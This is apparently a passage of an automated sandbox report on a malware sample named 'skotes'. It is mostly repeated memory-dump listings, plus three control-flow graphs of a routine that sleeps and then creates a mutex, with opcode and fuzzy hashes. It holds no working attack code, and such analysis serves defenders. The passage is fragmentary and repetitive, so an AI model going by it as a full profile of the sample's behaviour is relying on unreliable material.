                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: c518d8367bb4af89b2bdfccd7911c60cdf6329e893d18678c3f73e73cfa7b5f5
                                                                                                                                                                                                                                • Instruction ID: d2a075dce22896e5dd4e6c2277ac0a7fb62b6b74e5520760d00da429b8b79c86
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c518d8367bb4af89b2bdfccd7911c60cdf6329e893d18678c3f73e73cfa7b5f5
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F93128B1B10208DBEB18DBFCDC897BDB777AB85310F248269E1189B3D1C77A59808612

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 124 6fa418-6fa438 128 6fa43a-6fa446 124->128 129 6fa466-6fa482 124->129 130 6fa45c-6fa463 call 70d663 128->130 131 6fa448-6fa456 128->131 132 6fa484-6fa490 129->132 133 6fa4b0-6fa4cf 129->133 130->129 131->130 136 6fa93f-6fa949 call 726c6a * 2 131->136 138 6fa4a6-6fa4ad call 70d663 132->138 139 6fa492-6fa4a0 132->139 134 6fa4fd-6fa916 call 7080c0 133->134 135 6fa4d1-6fa4dd 133->135 140 6fa4df-6fa4ed 135->140 141 6fa4f3-6fa4fa call 70d663 135->141 155 6fa94e 136->155 156 6fa949 call 726c6a 136->156 138->133 139->136 139->138 140->136 140->141 141->134 157 6fa953-6fa994 Sleep CreateMutexA 155->157 158 6fa94e call 726c6a 155->158 156->155 160 6fa9a7-6fa9a8 157->160 161 6fa996-6fa998 157->161 158->157 161->160 162 6fa99a-6fa9a5 161->162 162->160
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 61241171f88a5f1f2bf6b1beda5da3680e1f94a0c3a605e548f36058a34a260b
                                                                                                                                                                                                                                • Instruction ID: 88f6e306d6841c45f9ef1f66293c9e1aeb58a94b0b111a36009c7723bdeeeef0
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61241171f88a5f1f2bf6b1beda5da3680e1f94a0c3a605e548f36058a34a260b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 44313C71A10208DBEB18ABFCD8897BDB7B3EBC1314F204259E1589B3D5C7B959C08662

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 164 6fa54d-6fa56d 168 6fa56f-6fa57b 164->168 169 6fa59b-6fa5b7 164->169 170 6fa57d-6fa58b 168->170 171 6fa591-6fa598 call 70d663 168->171 172 6fa5b9-6fa5c5 169->172 173 6fa5e5-6fa604 169->173 170->171 174 6fa944-6fa949 call 726c6a 170->174 171->169 176 6fa5db-6fa5e2 call 70d663 172->176 177 6fa5c7-6fa5d5 172->177 178 6fa606-6fa612 173->178 179 6fa632-6fa916 call 7080c0 173->179 190 6fa94e 174->190 191 6fa949 call 726c6a 174->191 176->173 177->174 177->176 183 6fa628-6fa62f call 70d663 178->183 184 6fa614-6fa622 178->184 183->179 184->174 184->183 194 6fa953-6fa994 Sleep CreateMutexA 190->194 195 6fa94e call 726c6a 190->195 191->190 198 6fa9a7-6fa9a8 194->198 199 6fa996-6fa998 194->199 195->194 199->198 200 6fa99a-6fa9a5 199->200 200->198
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807117306.0000000000990000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807135796.0000000000992000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807154292.0000000000994000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807174535.0000000000996000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807193439.000000000099E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009A1000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807212159.00000000009C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807263134.00000000009ED000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807282308.00000000009EE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807301165.00000000009EF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807319578.00000000009F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807338048.00000000009F4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807358307.0000000000A02000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807377408.0000000000A03000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807395525.0000000000A04000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807415415.0000000000A05000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_6f0000_skotes.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                                                                                • String ID: T2u
                                                                                                                                                                                                                                • API String ID: 1464230837-1508609724
                                                                                                                                                                                                                                • Opcode ID: 7e6f0018411656e007e4df30f64384b83417244871a973bf3d8e5fb5c2877ef3
                                                                                                                                                                                                                                • Instruction ID: 416985c48a03ce617fd3a1c2786ee4cb0511d4d4baaa3be3f0b9869f36ba08e3
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7e6f0018411656e007e4df30f64384b83417244871a973bf3d8e5fb5c2877ef3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4F3109B1A10208CBEB18ABF8DC897BDB763ABC5314F248259E518DB3D5C77999808612

                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                control_flow_graph 202 6fa682-6fa6a2 206 6fa6a4-6fa6b0 202->206 207 6fa6d0-6fa6ec 202->207 208 6fa6c6-6fa6cd call 70d663 206->208 209 6fa6b2-6fa6c0 206->209 210 6fa6ee-6fa6fa 207->210 211 6fa71a-6fa739 207->211 208->207 209->208 212 6fa949 209->212 214 6fa6fc-6fa70a 210->214 215 6fa710-6fa717 call 70d663 210->215 216 6fa73b-6fa747 211->216 217 6fa767-6fa916 call 7080c0 211->217 218 6fa94e 212->218 219 6fa949 call 726c6a 212->219 214->212 214->215 215->211 223 6fa75d-6fa764 call 70d663 216->223 224 6fa749-6fa757 216->224 225 6fa953-6fa994 Sleep CreateMutexA 218->225 226 6fa94e call 726c6a 218->226 219->218 223->217 224->212 224->223 234 6fa9a7-6fa9a8 225->234 235 6fa996-6fa998 225->235 226->225 235->234 236 6fa99a-6fa9a5 235->236 236->234
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Sleep.KERNELBASE(00000064), ref: 006FA963
                                                                                                                                                                                                                                • CreateMutexA.KERNELBASE(00000000,00000000,00753254), ref: 006FA981
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000001.00000002.1806081800.00000000006F1000.00000040.00000001.01000000.00000007.sdmp, Offset: 006F0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806061991.00000000006F0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806081800.0000000000752000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806150113.0000000000759000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806171298.000000000075B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806192043.0000000000767000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806342695.00000000008C0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806363245.00000000008C2000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806386286.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806403949.00000000008D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008D8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806427336.00000000008E3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806507101.00000000008E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806532882.00000000008E8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806556541.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806612445.00000000008FC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806638457.0000000000912000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806747047.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806765856.000000000091B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806790332.0000000000920000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806814100.0000000000921000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806834399.0000000000928000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806859021.0000000000946000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806879560.000000000094C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806901566.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806924869.0000000000954000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806950300.0000000000963000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806969215.0000000000968000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1806994089.0000000000971000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807019732.0000000000975000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807038418.0000000000976000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807057673.0000000000979000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807075898.000000000097A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                • Associated: 00000001.00000002.1807097030.0000000000982000.00000040.00000001.01000000.00000007.sdmpDownload File
